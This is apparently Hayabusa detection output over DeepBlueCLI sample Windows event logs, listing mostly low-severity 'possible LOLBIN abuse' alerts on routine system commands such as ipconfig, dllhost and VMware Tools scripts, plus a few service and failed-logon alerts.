5042016-08-20 05:47:31.026 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5052016-08-20 05:47:31.073 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5062016-08-20 05:47:46.745 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5072016-08-20 06:12:04.462 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xda0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5082016-08-20 06:12:28.290 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5092016-08-20 06:12:41.946 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4b0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5102016-08-20 06:13:05.290 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5112016-08-20 08:02:20.062 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5122016-08-20 08:02:20.640 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5132016-08-20 08:02:22.265 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5142016-08-20 08:02:35.890 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x494 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5152016-08-20 08:02:40.458 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x720 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5162016-08-20 08:02:40.458 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5172016-08-21 01:03:06.082 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20160820160305.log C:\Windows\Logs\CBS\CbsPersist_20160820160305.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xce8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5182016-08-21 01:03:06.176 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5192016-08-21 01:03:07.144 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5202016-08-21 01:03:07.801 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x250 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5212016-08-21 01:03:11.676 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\wuauclt.exe" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x614 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5222016-08-21 01:03:25.629 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc04 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5232016-08-21 01:06:05.381 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5242016-08-21 03:14:25.528 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x848 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5252016-08-21 03:14:25.546 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5262016-08-21 03:14:25.561 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5272016-08-21 03:16:25.456 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5282016-08-21 04:31:04.654 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5292016-08-21 05:05:57.675 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5302016-08-21 05:05:58.135 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5312016-08-21 05:06:13.653 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf2c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5322016-08-21 05:06:19.672 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdf0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5332016-08-21 05:06:38.077 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5342016-08-21 05:06:38.083 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x578 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5352016-08-22 06:00:11.250 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5362016-08-22 06:00:12.103 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5372016-08-22 06:00:12.141 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5382016-08-22 06:00:33.844 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc58 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5392016-08-22 06:03:11.036 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x908 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5402016-08-22 06:03:11.056 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5412016-08-22 06:10:05.018 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5422016-08-22 06:10:05.024 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8ec | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5432016-08-22 06:42:10.029 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5442016-08-22 06:42:10.656 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5452016-08-22 06:42:10.669 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5462016-08-22 06:42:29.724 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5472016-08-22 06:45:11.847 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xbb0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5482016-08-22 06:45:13.000 +09:00IE10Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5492016-08-22 06:45:28.000 +09:00IE10Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5502016-08-22 06:45:28.000 +09:00IE10Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
5512016-08-22 06:45:29.859 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5522016-08-22 06:45:30.140 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5532016-08-22 06:45:43.671 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5542016-08-22 06:45:43.828 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5552016-08-22 06:45:45.886 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Wallpaper\autologon.bat" " | Path: C:\Windows\System32\cmd.exe | PID: 0xbe0 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5562016-08-22 06:45:46.517 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc00 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5572016-08-22 06:45:47.330 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5582016-08-22 06:58:44.730 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\RunDll32.exe" "C:\Windows\system32\WerConCpl.dll", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x238 | User: IEUser | LID: 0x4d011rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5592016-08-22 07:00:01.654 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf30 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5602016-08-22 07:00:01.685 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf54 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5612016-08-22 07:24:56.194 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x210 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5622016-08-22 07:31:56.163 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5632016-08-22 07:31:56.506 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\IEUser\AppData\Local\Temp\hqhlzlxj.cmdline" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x710 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5642016-08-22 07:31:56.600 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\IEUser\AppData\Local\Temp\ffyanabt.cmdline" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xf70 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5652016-08-22 07:31:56.756 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\IEUser\AppData\Local\Temp\b_6b5oib.cmdline" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x6dc | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
